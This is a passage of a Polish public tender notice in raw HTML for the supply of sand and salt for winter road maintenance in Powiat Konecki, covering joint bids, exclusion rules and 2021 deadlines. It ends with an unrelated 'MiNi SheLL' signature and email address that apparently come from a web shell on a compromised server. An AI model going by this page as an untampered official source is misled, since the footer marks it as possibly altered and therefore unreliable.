oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 4.8 Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy<br/>ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo<br/>reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>4.9 W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>1) brak podstaw wykluczenia wskazanych w pkt 4.1.1 oraz warunek określony w pkt 4.1.2 musi<br/>wykazać/ spełniać każdy Wykonawca z osobna,<br/>2) warunek określony w pkt 4.1.3 musi spełniać co najmniej jeden Wykonawca – ten, który zrealizuje<br/>zamówienie (jego część) do realizacji którego te zdolności są wymagane,<br/>3) warunki określone w pkt od 4.1.4 do 4.1.5 musi spełniać co najmniej jeden Wykonawca lub<br/>wszyscy Wykonawcy łącznie.<br/>4.10 Zamawiający dokona oceny spełniania przez Wykonawcę warunków udziału w postępowaniu na<br/>zasadzie wykazał/nie wykazał, na podstawie podmiotowych środków dowodowych, oświadczeń i<br/>dokumentów, wymienionych i opisanych w Rozdziale 5 SWZ.<br/>4.11 Zamawiający wykluczy z postępowania Wykonawców, którzy nie wykażą spełniania warunków udziału<br/>w postępowaniu oraz nie wykażą braku podstaw wykluczenia.<br/>4.12 Wykonawca nie podlega wykluczeniu w okolicznościach określonych:<br/>1) w art. 109 ust. 1 pkt 4, jeżeli wystąpią przesłanki określone w art. 109 ust. 3 ustawy,<br/>2) w art. 108 ust. 1 pkt 1, 2 i 5 lub art. 109 ust. 1 pkt 4, jeżeli udowodni zamawiającemu, że spełnił<br/>łącznie przesłanki określone w art. 110 ust. 2 ustawy.<br/>4.13 Zamawiający oceni, czy podjęte przez Wykonawcę czynności, o których mowa w art. 110 ust. 2<br/>ustawy, są wystarczające do wykazania jego rzetelności, uwzględniając wagę i szczególne<br/>okoliczności czynu Wykonawcy. Jeżeli podjęte przez Wykonawcę czynności, o których mowa w<br/>zdaniu pierwszym, nie są wystarczające do wykazania jego rzetelności, zamawiający wykluczy<br/>Wykonawcę. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 14.3	Zamawiający przewiduje możliwość wprowadzenia zmiany do zawartej umowy, na podstawie art. 455 ustawy, w sposób i na warunkach szczegółowo opisanych w załączniku nr 2,2a do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-10-15 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP, zaś miniPortal jest miejscem, w którym Wykonawca znajdzie opublikowany przez Zamawiającego formularz postępowania oraz może zaszyfrować ofertę. Cały proces szyfrowania odbywa się na stronie miniPortal.uzp.gov.pl.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-10-15 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-11-13</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Z uwagi na ograniczona liczbę znaków w formularzu służącym do przesłania ogłoszeń drogą elektroniczną w Sekcji II pkt. 2.3 nie podano pełnej nazwy przedmiotu zamówienia , pełna nazwa przedmiotu zamówienia : Część 1- Dostawa piasku do zimowego utrzymania dróg powiatowych na terenie Powiatu Koneckiego w sezonie 2021/ 2022<br/>Część 2- Dostawa soli do zimowego utrzymania dróg powiatowych na terenie Powiatu Koneckiego w sezonie 2021/ 2022

Creat By MiNi SheLL
Email: jattceo@gmail.com